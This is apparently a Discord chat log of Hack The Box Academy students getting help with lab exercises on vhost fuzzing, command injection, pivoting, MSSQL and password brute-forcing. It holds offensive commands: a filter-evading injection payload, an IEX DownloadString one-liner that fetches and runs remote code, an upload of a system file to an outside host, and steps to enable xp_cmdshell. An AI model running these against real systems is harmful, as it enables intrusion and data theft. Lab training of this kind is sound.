#modules

most standard queries are fine

it's just selecting and showing info like columns is a bit more of a pain

I guess it makes me feel insecure because it's so alien I wonder if I need to take a class on it to be able to use it in an offensive context.

Mssql is just ______

Is knowing a dozen commands enough?

ok its giving me the apache webpage so its not working

select * from [table] where [column name] = '<query>'

so your filter is wrong

ok

how do I get the right filter?

all you need to find the information is given in the section

there's a bash loop with curl they use; you only really need to loop it for a minute to see what the filter should be

note you might need to add -E to the echo portions

as sometimes it doesn't do the newline thing

or something like \\n might work

Sql

indeed

that's a generic SQL query that would work in MSSQL and MySQL/MariaDB

To start bug bounty there is any prequestis

What about GO?

And also, how do I show all databases?

Already I'm learning in infosec foundation

select name from sys.databases;

You're awesome 😎

it's literally in the Footprinting module ¯_(ツ)_/¯

and expanded on in the Attacking Common Services module

.

thats i hate about mssql. that there

information security foundations path can be considered a pre-req path

list databases is such a beauuty

So that mean I'm in the right place

though i think depending on the tool used there might be some internal commands specific to the tool that makes enumeration easier

yes, i believe it covers all the minimum info needed

After I can learn pentesting or bug bounty

yep

depends what interests you more

BB is web domain stuff, Pentesting is Active Directory/networked environments

I will pentesting and bug bounty
It will be Pentesting web

is that great

"Pentesting Web" that's not how that works

Pentesting, in this context, solely refers to exploiting a vulnerable server to obtain and pwn a domain

with Bug Bounty the focus is SOLELY on just finding and exploiting with no major system compromise (except maybe exposed files through LFI/RFI/etc)

btw anyone has seen the senior web penetration testing content. How is it compared with Portswigger?

Yes, most of the time in actual bug bounties they don't want you utilizing the vulnerability fully.

So there is no realtive thing in pentesting bug bounty

Bug Bounty and Pentesting are two separate things

Yes.

I changed my command to this and its still not working:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo -E "\\n********\nFUZZING: ${vhost}\\n********";curl -s -I http://10.129.89.192 -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done

I knew but why I said pentesting web cause its like bug bounty

try using the domain instead of the IP

Just run ffuf, look at the response size in the errors, ctrl+c, then change your -fs to the size

that too

?

it's not

web app pentesting is a thing. the bug bounty hunter job role path is a great foundation for web app pentesting if you want to go that route. but web app pentesting is not the same thing as bug bounty hunting.

^

Really thinks that look very better

would you say CWEE would also build on that or no

What different between bug bounty and pentesing web

Web App Pentesting though is something you're hired for

haven't taken either. but i assume yes

Bug Bounties are just public bounties to find security vulnerabilites in a webapp

also often with Web App Pentesting you're given the source code

I need to know what different between bug bounty web pentetiing

Try google. https://blog.unguess.io/en/penetration-testing-vs-bug-bounty-whats-the-difference

i'm on the 1st ad skills assesment. I need to access a mssql instance that is only available through the network of the host I own.
i used chisel to open a socks5 tunnel
./chisel server -v -p 1234 --socks (attack)
.\7zip.exe client -v 10.10.16.41:1234 socks (target)

then put this line in my /etc/proxychains.conf
socks5 127.0.0.1 1080

in the output of the client, i can see it's pointing 127.0.0.1:1080 to my socks tunnel but when i run proxychains nmap -sT -F on the hosts I found through a ping sweep I get connection refused. I also just tried running mssqlclient with the creds but still nothing.

Fixed by using meterpreter routing & socks proxy. After cracking svc_sql pass don't let the 1433 port in the question confuse you, you need to rdp into MS01.

@fathom pendant

i haven't touched either so i don't know

This is gonna be mad fun when I know what I’m doing

what is your speciality? if you dont mind telling

Plot Twist: it won't

https://tenor.com/view/thats-the-neat-part-you-dont-invincible-gif-27194608

Damn..

Still better than pre-med

don't worry

tfw syntax error

i can safely say that i had a very bad time on this week's box

mfw the documentation for this api is out of date

@fathom pendant

instead of ipaddress, you type ipadress

what?

don't just ping me without having a question

or responding to something

is this the right command:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10198

why don't you run it and find out

¯_(ツ)_/¯

remember: try first - ask if failed

It broke everything, I have no more computer

skill issue

Fr…

Look my question different bug boungy web pentesting

Utilize Google

I did and its not getting me the results

have patience

Does gpt help

gpt isn't a search engine

I mean for troubleshooting

do the same thing you did that got you the first set of results

except with this new filter

Is Ai 🤣

that's the only thing you change

same message applies

Try stuff until it works 😈

GPT can be wrong

I am trying this because I found a hidden page but it gives me apache:

curl -s http://10.129.89.192 -H "Host: hidden.inlanefreight.htb"```

that's my thing

and if it's broken, you don't wanna Fubar it

apache is wrong page

I know

pentesting in web mean that

Implent vulnerablity I'm right

USE. GOOGLE

if the vhost isn't in your /etc/hosts file then it's going to bring up the apache page

i don't recall having this issue but i could be wrong

but i don't recall -hidden- being one of the vhosts

If I learned two bug bounty and pentesting it will be great thing for two certfications

the pentesting cert from HTB does not assist with web app pentesting

it is a completely separate topic

i believe it's because he's going to the IP instead of the hostname, so he'll need the hostname in /etc/hosts and then to navigate there

my command uses curl http://ip -H "Host: ${subd}.inlanefreight.htb" (i used a for loop to iterate through all the found subdomains and output it to a file

yeah but he's saying when he visits the site it's just the default apache page

well if he's visiting a bad webpage that doesn't contain the flag

then yeah it's gonna be the apache page

if the IP is hosting multiple subdomains, visiting the IP is just going to bring up apache instead of the virtual site

he's using curl

ahh yeah good point

i'm reading it as "the curl result is giving the apache default page"

not "i'm visiting this in browser and getting the apache page"

Guys! Please... Command injections, skill assesment. I am trying to ...

you might want to remove that as it may be considered spoilers (gives the injection point away)

What am i doing wrong in this live? I have already found execution point but this... makes me wanna cry

i will, after few minutes

can i do like that?

i would simplify your payload, yours looks pretty complicated and the filter isn't that crazy

ur doing too much i did not do all dat shit
use mv command in linux and put ur payload in there. see if it works. even if it does you need to break ur payload up line by line and compare with ur notes

I tried mv command: Permission denied

I can't break out of inlined command

can confirm: h* is not a valid subdomain for that section

as I didn't add anything to my /etc/hosts and was able to visit a valid answer subdomain with the right Host header

i figured he was using it as a placeholder to not spoil

u got to read something ur user can access
use an environment variable for the semicolon.
practice ur payload locally, make sure ur reading from a directory u can access of course

my favorite thing about this section is that flag 3 has l3375p34k flag_four in it really makes people think

Somebody knows how i can doenload ysoserial

I have tried many variations on the same command and its some version of this:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo -E "\\n********\\nFUZZING: ${vhost}\\n********";curl -s -I http://FUZZ.inlanefreight.htb -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done

Its not getting me the results tho. I also try variations on this:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918

Its not giving me any flags. I am trying all sorts of URLs with variations of this:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ curl -s http://10.129.89.192 -H "Host: buggalo.inlanefreight.htb"

I don't get it

are you getting subdomains returned?

yes

so the command is working..

ok

what section are you on

virtual hosts

for information gathering - web edition

I could use some help on "Active DIrectory Trust Attacks" - "Skill Assessment", question 2. I'll explain what I have tried so far.

so what's the issue then? the command worked and showed you the vhost

the first command here doesn't make sense; the second should give something

ok

let me change the first command then thank you for pointing me in the right direction

you don't need to do that, you said you got the vhost results from ffuf already

you're just going to enumerate the same thing

running the second command gave me a proper set of vhosts

then how do I get the right vhost? at this point trial and error?

because I have tried dozens of vhosts

if you got a valid list of subdomains, you can use the curl command on the subdomain to get the flags there

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

this downloads to memory executes PSUpload.ps1

which means this command can be run

Ok thanks

Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts

But I thought I was doing that

becaue Invoke-Fileupload is a function in my session now

And it gave me apache

this works i tested it. But what didn't work was downloading the powershell script

and executing locally like this .\PSUpload.ps1

you initially had a wrong list

because your initial fs was wrong

the new fs in your ffuf command is correct and should yield results

also ffuf likes to be funky if not in fullscreen

this payload works locally ||'&sh&c'p'${IFS}${PATH:0:1}flag.txt${IFS}${PATH:0:1}var${PATH:0:1}www${PATH:0:1}html${PATH:0:1}files${PATH:0:1}tmp${PATH:0:1}flag.txt'||

Am i overcomplicating again? 😦

no, but your command looks strange. why are you copying a file to a random dir that may or may not exist instead of just reading the flag

So is tells that vulnerablity for pentesting

How to see vulnerablitiy and check it that pentesting

that's part of the process

you probe the app for vulnerabilities

But the bug bounty report the bug

you report a bug/vulnerability you find

not random, it is shown on website, but it is not viewing anything either

don't

lmao

Probe mean scan the app right

i'm already on low enough patience lol

🤣🤍

it means following whatever methodology you've built and researching

i bet Marcie woulda been done with pentester's path a month ago if they weren't in this channel

We will learn the pentesting and we know about it

if i wasn't on the brink of homelessness for a few months :):):)

And I love the bug bounty

I spent a solid 4 months without internet even, probably longer

and let me tell ya, tethering and trying to do HTB academy is NOT fun

saw one guy in here doing the path on his phone

With the pentesting

Because I love pentesting

You don't know anything about it, how can you love it lol

I will tell you

don't

i am at 80 percents, currently, if someone is interested

and my challenge is to finish it till 10 of the May

The thing is test the vulnerbality and check it if it cable for hacking

🤣

https://tenor.com/view/family-feud-survey-says-strike-buzzer-wrong-answer-gif-16312959

I dnt care anymore

I will learn about whatever it takes

😉

gonna take a break

and try a machine on the main platfrom

because you have to import it

ah

PSUpload is a powershell module, not an executable

that IEX command does import it btw

does it? i didn't read

yh this is my ignorance of powershell

||'&sh&cat${IFS}${PATH:0:1}flag.txt'|| the only question is how can i see the output...

yeah it downloads and imports it into the current session

so actually if i have the module as a file locally i would run IEX to import the module also?

then they just need to invoke it properly

No, if you transferred the file locally then you'd need to import it into your session

ok i see

the IEX command downoads AND imports it

Import-Module

i want this

many of the modules will have a c:\tools folder with various powershell scripts, if that's the case you can simply import the file

i guess

I don't think you're going to see the output using the & operator

i need a crash course in pshell

||?

if it's imported then you just need to use Invoke-Fileupload

I believe one of the first pages in the module goes over each operator

https://github.com/juliourena/plaintext/blob/master/Powershell/PSUpload.ps1 btw i just read this to figure it out

yup, but will | be displayed properly? There is nothing displayment

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/get-command?view=powershell-7.4

thx

i'll do a little study on pshell

I would have to see your payload, i was able to use the & operator and it displayed the info

it will be useful. it's just that i know practically nothing

not going to work like that

now?

you can DM me so you don't have the post that here

thx!

I get a list of subdomains but I don't see how I am supposed to pick out right subdomain:

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.89.192 -H "HOST: FUZZ.inlanefreight.htb" -fs 10918

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ cat /opt/useful/SecLists/Discovery/DNS/namelist.txt | while read vhost;do echo "\\n********\\nFUZZING: ${vhost}\\n********";curl -s -I http://10.129.89.192 -H "HOST: ${vhost}.inlanefreight.htb" | grep "Content-Length: ";done

┌─[us-academy-2]─[10.10.15.78]─[htb-ac-605555@htb-fxzlqz9u4y]─[~]
└──╼ [★]$ curl -s http://10.129.89.192 -H "Host: classifieds.inlanefreight.htb"

there are only 6 subdomains that should return for the vhost

the second command will NOT return any useful information aside from the content length to filter with ffuf

again i can confirm that the wordlist and your ffuf command should be correct

so either your host silently died on you or something is wrong as I literally just sanity checked this

I'm somewhat new here, which channel can I talk about the Pro Labs?

#prolabs-[insert prolab name] you need to read and follow #welcome to be able to access them

I purchased the annual gold plan for the benefit of the solution assistance, but I am not seeing any modules that have this feature. Do I need to wait a certain time for it to activate or should it be instant?

I believe you enable it in settings

Ah! Thanks. I will check it out.

For the sake of learning, I suggest avoiding it. As the plaintext solution isn't obfuscated or hidden in any way

You can literally just go through, find the answer, and copy/paste without touching the box

They didn't do any QA on the feature

how that even possible ?

48 modules like 1,5 module per day

Tier 0 modules go brrr

even

Also some modules are relatively easier than others

It's been very helpful for me. If you don't have a of time especially. You do need to push yourself and use it as a last resort but... Yeah it's solid.

not impossible ¯_(ツ)_/¯

They just missed the mark on it for me. Imo

maybe , if you already know the content so you just work on challs

I'm not as good as you are with things I've never been exposed to before.

I would prefer it to be a collapsible list of steps

The whole dial into MSSQL via PS...I would not have figured that out.

It's explained to you in the module

¯_(ツ)_/¯

The Common Services module...?!

I didn't see it in there.

I kept looking for that and couldn't find the page. Where do you see the students of the month?

I got an email

dang. i completed like 25 modules in a month and didn't get an email

and i'm out of modules lol

you got an email of the summary of months like what modules are released , what's the upcoming events , what's articles was published ....

no, i didn't get that email

maybe you need to subscribe somewhere idr

Hell yeah bro!

KangZ!

it was a grind lol

Yep, read the sql section carefully

Alright, I searched for it and couldn't find it. I'll take a closer look.

Sqlcmd

From: the sql section and the intro section

@valid viper

😐

I stand corrected.

:3

It'd be weird if the section about sql didn't teach you how to connect to sql

It happens. I'm having to finish the course while starting a new job and planning a move. I was bound to miss something.

Take it slow

MSSQL though, ugh.

Don't rush

Even if you gotta pick it back up later

I'll go as slow as I can afford to. I need to get on with Synack.

ACK

I'm sick of sysadmin.

I did a blue team ticket today and then the security guy says 'No, don't look at the logs on the endpoint. That's my job.'

😐

I need six months with Synack and a CVE.

Then I'll be ready to handle my action.

i mean I'd think part of sysadmin would be security, or at least understanding what may have tripped something ¯_(ツ)_/¯

?

good luck getting a CVE ig

lmao my last job told me "security has nothing to do with your job"

it was their way of saying they didn't want to pay for certs

i just mean looking at a log that tripped because of a service account you set up sounds like your job

I knew what it was, and I investigated most of it. But he wouldn't let me finish.

sounds like he just has a stick up his ass

did you at least pass the info you found off to him?

Yes.

he should have been faster at his job to grab his ticket ¯_(ツ)_/¯

Well no it was my ticket.

like assigned to you?

That was the thing :/

not just you plucked it from the pool?

Basically. There's no dispatcher.

i'd go to your manager tbh

Yeah they say they need a better SOP.

Honestly sounds like simple ticket delegation as well

that way sysadmin doesn't get a security ticket

i.e. a flag system that sorts it into a bucket

It was a fraudulent email.

It was neat because it originated internally, but no rogue logins.

IT.sec, IT.sys, IT.sup

forged headers

None of that exists at my MSP.

Nope.

spoof

We checked the headers.

¯_(ツ)_/¯

if it's a well enough spoof then it's not gonna be noticeable easily

Possibly a spoof, but I doubt it. Apparently this has happened with this person 3 times before.

sounds like mr log checker didn't do his job the first 2 times then

well then could be a compromised host

Bro he didn't even check the scan I don't think.

This is my suspicion. But they wouldn't let me check the logs.

¯_(ツ)_/¯

sounds like BEC

BEC?

BEC = business email compromise

AH

Nothing showed up in Entra or Exchange.

anyway; this is veering far off-topic

you should verify your account so you can hang out in the brainrot that is #general

Anonymity is everything.

yeah but the brainrot is fun

and allows you to take part in more off-topic conversations

This is on topic though.

Who has more creds than IT Glue other than the Feds?

the topic of this channel

which is academy modules

Sorry. I'll go back to /b/

Which number they are expecting I tough was count for DELETE FILES

When did they add walkthroughs on the modules?

For the end of section questions?

I don't know how I was supposed to figure out the FILE PREVENTION INCLUSION section's second question without it. So much detail in there that wasn't in the module! Thanks HTB!

Honestly way better than the previous option.

#academy-announcements

Oh weird, I must only be getting notifications for the overall HTB Discord announcements!

according to Pedant from my recent feedback on a walkthrough: a lot of the stuff is also assuming pre-existing knowledge from a pre-req module to them

so while it may not have been directly in the module it's assumed you should have known from somewhere

I guess I missed the part on the php.ini file. I was searching for "system()" not "disable_functions"

¯_(ツ)_/¯

my gripe is that they mostly seem half-assed

What is the difference between "view page source" and the page source code?

Looking at the Source Code Disclosure section of the PHP filters section, seems like there's no need to get base64 encoded source code if you can just right click and pull the source code

Is this HTML vs PHP source code?

i think source code dives into the actual code of the page

i.e. the backend api

whereas page source is just "hi this is the page you're looking at"

page source is whatever is rendered to you. source code contains what you see and all the backend logic

general rule of thumb

ah so i was fairly close

Cool, thanks @dim wolf and @fathom pendant

but the AD enum module is CHONKY

because it's building off basic AD knowledge and going "hey look at this cool thing"

So is some of the source code PHP and some HTML in that case, or is it just "hidden" HTML on top of the HTML?

"wait you can do that?" has been said by me many times

HTML on top of HTML
it's just turtles all the way down

you will not see any PHP in a page source

usually a reference maybe

all of that is handled by the backend

and if there is it's what marcie said

or it's commented out

but even then that's hidden in the comment tags or buried

best way to know what is on the backend: dev-tools -> network tab -> load page

I'll have to brush up on my HTML structure then, I don't quite understand how the HTML nests

I know it's not something I necessarily need 100% but I hate not knowing how things like that work

It's frustrating

interact with something; see the call -> hey it looks like there's <codebase> on the backend

often if there's a backend involved it's done on the Config level

there's front end and back end. it's what you see, vs what the server is doing. when you right click and "view source" you only see what your browser sees, you don't see the back end logic

so what do I do differently about the second command?

not running it

you have all the information you need to feed to ffuf

ok

the second command is purely an information gathering command

I thought I was running ffuf. Ok got it.

the second command i referred to was the loop command

ok

ok I completed the whole module

I cat catting out the wrong file. I managed to get the right file to cat out.

worked great. I am now on next section.

in the pivoting module. it says Downloading Payload from Windows Target
We can download this backupscript.exe from the Windows host via a web browser or the PowerShell cmdlet Invoke-WebRequest. rdp port is not open on inside ip. where to execute this?

PS C:\Windows\system32> Invoke-WebRequest -Uri "http://172.16.5.129:8123/backupscript.exe" -OutFile "C:\backupscript.exe"

FOOTPRINTING   > Footprinting Lab - Easy

can someone hint me regarding this module

Enumerate the server carefully and find the flag.txt file. Submit the contents of this file as the answer.

i tried ftp but i face into this.

ftp> ls -R
229 Entering Extended Passive Mode (|||19187|)
150 Opening ASCII mode data connection for file list
226 Transfer complete

Then, cant do much

use ls only or ls -a

ls -la*

ohook

do u know which directory to look for.

eumerate all brother.

read the synposis carefully

also enumeration is the key, which is the point ofthe module

enumerate, iterate, repeat

it's a few steps once you see everything

it might also help to be on the right port as well

i hope you scanned

@fathom pendant

got it nvm

ssh might work brother

Marcie, out of the blue quick question: What is your personal reflection of the Documentation & Reporting Module? Wanted to share opinions briefly

thnk got it.

thanks.

haven't done it

i've been putting my progress on the side rn

does anyone else ever not understand anything until they actually try it
like you'll read a module about something and it's just words but it makes perfect sense when you do the examples
is this normal

apparently that's what being a hands-on learner is.

"what does this complex string of commands do... oh"

Hmmm... More like fire fire fire... water hose, fire, water hose water hose water hose water hose water hose water hose water hose water hose water hose..... fire.

some advice; break the command down into it's components and run it down one portion at a time if it's
command1 | command2 | command3 | ...

like idk i'm just reading about active directory and none of it makes sense yet because they're just saying stuff like "thing x is maintained by thing y" but they don't tell me what thing x or thing y are

and if you're confused by a certain option: man <command> or <command> -h/--help

oh in powershell

actually it's usually not commands, it's usually theory i have trouble reading through

Get-Help

i believe it's Get-Help <command> or something like that

no the commands and stuff are what i'm actually good at understanding

ah so why does this work

yeah kinda

I wouldn't mind try to work on my communication and recollection skills tomorrow/over the weekend if we have some time.

I could use the practice. It wouldn't be 100% fool proof

more just like definition after definition and the definitions contain definitions that they never defined

more like 65% confidence, the rest researching, standard pentest process, etc

a lot of what drives powershell is just xml

pretty much most powershell output is xml

no not powershell i'm actually pretty good at powershell

Oh? That just became a little interesting

yeah, event logs? just fancy xml

pretty much

powershell is just really efficient at sorting xml

the practical stuff like learning commands are the stuff i'm good at

it's just a ton of definitions and stuff

but nothing wrong with doing external research if something just doesn't click

yeah i've been doing a lot of that

^^^^^^^^^

i've found the microsoft docs usually do a way better job at explaining AD stuff than hackthebox

HTB does tend to introduce concepts but don't fully define them (and then in a later module, they're defined really well)

Intro to AD?

yep

i wouldn't worry too much about it

I've had a hit/miss relationship with Microsoft, but I'd agree, most AD information is decent.

the real meat and potatoes of it is in the AD enum and attacks module

^^

the intro is just to give a broad overviiew of AD

ok yeah i figured they would start being more specific about this stuff once the time comes to actually start using it

that is reassuring

AD enum and attacks actually dives into some more stuff like Domains and Domain trusts within Forests

literally like 3 sections in the AD enum module is dedicated to talking about inter-domain trusts

i've heard HTB has some seriously Big Boy AD modules

and Parent-Child relationships

i think the AD-Enum module has like 30 sections

potato heh

https://tenor.com/view/nsfw-skull-emote-gif-25783735

36

potatoes are juicy

@fathom pendant Lmao

AD enum and attacks is the biggest HTB academy module

yeah and only like one or two were just "short" definitions

everything else had some practical element to practice with it

ldap query? it's got you covered

We love Ldap! My bad, lmao

ok perfect because that's how i learn

GenericWrite and how to abuse it? boom

an entire section dedicated to DCSync

like just reading how to do stuff doesn't do shit for me i have to actually do it

also it's layered in a way of: footprinting, enumeration, attacking, lateral/vertical movement, domain elevation

also pivoting can play a huge role (at least for the exam)

and the whole AD enum module is one large inter-connected lab

so saving creds is really helpful

four password spraying sections and four attacking trusts sections
and don't forget the new entire module on attacking trusts

(you can even sniff out creds/hashes for later sections)

You just gave me an idea that I really like the thought of. Oddly, thanks!

Gonna go write it down

i write down everything i learn and all the steps and answers to the example questions and flags if that's what you meant

the module will sometimes provide/expect you to connect to a joined attack box

i just mean user:password combinations

having a file for those is helpful

hashcat has an output mode (-o) that you can save cracked files to

if it's something i do or come across during a lab i write it down

but mayhaps i'll make a separate file for those

it definitely helps so you don't gotta look through buried notes

oh you wrote it down 12 hours ago in the middle of this WALL OF TEXT

lmao

yeah my obsidian notes are hyper organized specifically to avoid that exact problem

also another module to be wary of reused passwords throughout is the Password attacks module, there are 2 hosts, linux and windows the linux ones are all inter-connected and the windows are all inter-connected

noted!

oh i save the creds directly in my vm as a file

that way I don't gotta tab out for it

oh i don't use a vm lmao

i know people here get mad at me for that but i don't care

it's generally preferable (and safer) to use a vm; but you do you

¯_(ツ)_/¯

i personally can't stand using vms

while it is against ToS to target other academy users, it can still happen

i talked to a bunch of people and they said they've never heard of that happening and that's pretty much just there for legal reasons

well yeah

it almost never happens but it's more of a habit forming thing than anything

i guess

idk maybe i'll migrate all this shit to a vm eventually

I'd rather not expose my direct system to a vm

and having my notes saved on a "separate" drive to my vm/work helps in case I have to reinstall

so i don't lose notes

yeah i have a plugin that backs up my notes to dropbox automatically

i mean if i'm ever planning on entering an actual corporate environment or working with malware or something then i'm going to use a vm but right now it's pretty low on my priority list

but if your setup works for you then I can't really force you to use a vm ¯_(ツ)_/¯

and yeah; working with malware it's an absolute must you either A work on a VM or B work on a sacrificial lamb computer that's not connected to a network

A VM is better as you can easily restart a vm from a snapshot if you goof and the malware bricks it

yeah no chance i'm working with malware on a production pc

i have almost no problem switching to a vm as long as there's some way i can relatively easily just transfer all of the tools and shit i have installed from my ssd to a vm

also the CDSA labs i believe are working with pre-sampled/logged malware or very safe PoC

and i haven't really taken the time to figure out the easiest way to do it

like if i could just sudo cp / [???]

i guess i could probably set up a shared folder

apt list --installed | grep -v "Listing" > installed.list

and I've had relative success at least just copying my /home/user folder to new installs

and just doing the minor setup for other stuff

yeah i mean i have almost nothing saved in my home directory

besides documents, pretty much everything is empty

if you're telling me you run around your system as root, we are no longer friends /hj

i do not for the record

i just don't have a lot of stuff installed on here

like i have a ton of tools and notes but that's it

but in reality it's not much, just identify the important config files that you absolutely need if you really have to

but as far as copying the whole of / i'm unsure how that would work migrating to a vm

yeah me neither

i mean in theory i could just copy each folder in / at a time

ik virtualbox has a file manager thing to where you can copy things over

yeah that and i could always just do a shared folder

i generally don't share folders between host/vm ¯_(ツ)_/¯

hmmm

but using dropbox, like you do for backups, sounds like a happy medium

that could work

in theory though you should be able to drop the files right into /

surprisingly my entire root directory is only 54gb

and since it's a VM, no harm no foul

true

can you use a flash drive with a vm
like if i plug a flash drive into my computer will it show up in a vm

that's another option
surely there's a way to do that

let's find out

oh yep it's possible
maybe i'll just get a 64gb flash drive or something
this doesn't sound so bad

└─$ python /usr/share/doc/python3-impacket/examples/mssqlclient.py damundsen@10.129.243.57 -windows-auth

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
Traceback (most recent call last):
File "/usr/share/doc/python3-impacket/examples/mssqlclient.py", line 94, in <module>
ms_sql.connect()
File "/usr/lib/python3/dist-packages/impacket/tds.py", line 538, in connect
sock.connect(sa)
ConnectionRefusedError: [Errno 111] Connection refused

Authenticate to 10.129.243.57 with user "damundsen" and password "SQL1234!"

• 0 Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
  Active Directory Enumeration & Attacks

  Page 23
  Privileged Access

Privileged Access

why it wont let me Use mssqlclient.py into it

it says in your error message

is mssql running on that host?

remember you're in a domain environment, there's likely a dedicated SQL server

(it also shows in the example command)

this is assuming you have either a pivot on the network OR are connected to the provided attack host

the attack host is the same as from the previous section

again, never make assumptions

also it says it RIGHT THERE in the question

not even that; the question directly says where to connect to

also the flag for this answer might make you chuckle

i c ok danke also
Tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance "ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
VERBOSE: ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433 : Connection Failed.
PS C:\Tools\PowerUpSQL> Get-SQLQuery -Verbose -Instance "ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433" -username "inlanefreight\damundsen" -password "SQL1234!" -query "EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;"
VERBOSE: ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433 : Connection Failed.
PS C:\Tools\PowerUpSQL>

ComputerName : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL
Instance : ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL,1433
DomainAccountSid : 1500000521000170152142291832437223174127203170152400
DomainAccount : damundsen
DomainAccountCn : Dana Amundsen
Service : MSSQLSvc
Spn : MSSQLSvc/ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL:1433
LastLogon : 4/10/2022 3:50 PM
Description :
why it failed?

just connect to the attack host (172.16.5.225) and connect with mssqlclient.py there

but i den ill need to chisel then

right? or port forward

nope

there's a provided linux host on 172.16.5.225

see the previous section for credentials

yes this attack host is persistent throughout the module

pl damle

also

you can just use the IP,PORT as the instance name

it's also likely not ACADEMY-EA-DB01.INLANEFREIGHT.LOCAL just ACADEMY-EA-DB01

ok danke

also, for the love of god

please just fucking wrap large blocks of text in ```

so it's more easily readable

will do in future also am㉿kali)-[~]
└─$ ping 172.16.5.225
PING 172.16.5.225 (172.16.5.225) 56(84) bytes of data.
dat no work..

jesus fucking christ

connect to 172.16.5.225 FROM THE WINDOWS HOST

ohh i c

you don't have access to that subnet without a pivot

danke

https://tenor.com/view/lilo-and-stitch-head-bang-bang-head-banging-head-bang-gif-15070607

also I implore you to just read the fucking page and the question

pl damle

no idea what thwat means

lok danke]

I highly suggest learning how to read and interpret errors and stuff like that

it will be highly useful to your future in this course

and for the exam

u r right danke for all ur jelp and advice so far

this is not the first time that you've had to be told to just read

https://tenor.com/view/first-time-meme-first-time-the-ballad-of-buster-scruggs-gif-24656975

I also suggest you learn what subnetting is and how subnets work because it's somewhat clear that you just don't know or have forgotten

Perform dynamic analysis.

wget is an alias of Invoke Webrequest. So you have to use the following syntax
iwr -Uri http://<your-box>/additional_samples -Outfile samples.zip

Does the shellcode like similar to the one in the section?
If yes, then did you remove all whitespaces?

trace the function one by one slowly.

<@&861185840277487616>

My bad

i suggest reading #rules and #welcome

as your post seemed to be promotion of some kind

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

i got a answer 37 but it is showing wrong answer

can anybody help me out

Hi everyone! I've managed to login as larry in the whitebox attacks skills assessment, but am unable to escalate to admin. Any Help would be greatly appreciated 🙂

yooo lets go im finally doing an Easy difficulty instead of Fundamentals 🗣️ 💯

the progress is crazy

Hi I am doing the Password Mutation exercise and I have mutated the password list given in the Resources using the custom.rule provided. To speed up the process, I split up the mutated passwords into 20 smaller chunks. I brute-forced using hydra on FTP service all the passwords but no valid passwords were found. What am I missing?

i don't recommend chunking up the mutated list

it's definitely in the mutated list so maybe you didn't mutate correctly

while it may seem more efficient - it's not

also use the custom.rule from the Resources, not the crappy rule list they have you write

I am suign the custom.rule from Resources section.

the final result should be ~ 90k words

what does your command look like?

Why not? Let's say that the password is somewhere in the middle or end of the mutated list, then by chunking, I am checking those passwords simultaneously making the bruteforcing more efficient.

if you're bruteforcing the same service with too many threads at the same time it'll drop

so you'll miss it entirely

and in the end you spend more time troubleshooting why it didn't work

running the full list will take around 20-30 minutes with 48 threads

iirc you can cut like the first 17k pw for this one

hydra -l sam -P chunked_password0.list ftp://{server_ip} -t 64

64 also tends to skip the result

Why?

48 is the most stable from what i've seen and experienced

But why?

as said earlier: too many threads hitting it at once

so the process and thread that might have the pw will drop it

due to it not being able to connect

because the port temporarily closes itself due to congestion

How do we know that the optimal number of threads is 48, and not less not more?

personal experience

you can tinker with more ¯_(ツ)_/¯

Will this apply when performing real world penetration testing or just the HTB labs?

but more often than not, i've gotten a fail on 64 but a success on 48

on a rl application you'd be using far less threads

default for ftp is 16

Like how many?

if youre trying to not generate lots of noise also

and trying not to accidentally DOS

100%

then bye bye service and goodluck spinning it up in a production env

you're 100% gonna get noticed if you accidentally DOS when an automated service suddenly can't do it's thing i.e. send a backup to FTP

I agree with Marcie, aim for stability against the service so you can give it time to open and close connections

generally you can just wait it out for it to restart itself, if you're lucky which is generally after a minute or so, but you're not getting those dropped packets back

so you won't know where the potential success/fail is

So, how do I determine the optimal number of threads?

trial and error i would say

in this case; many other people have experienced the pain

just like marcie has done

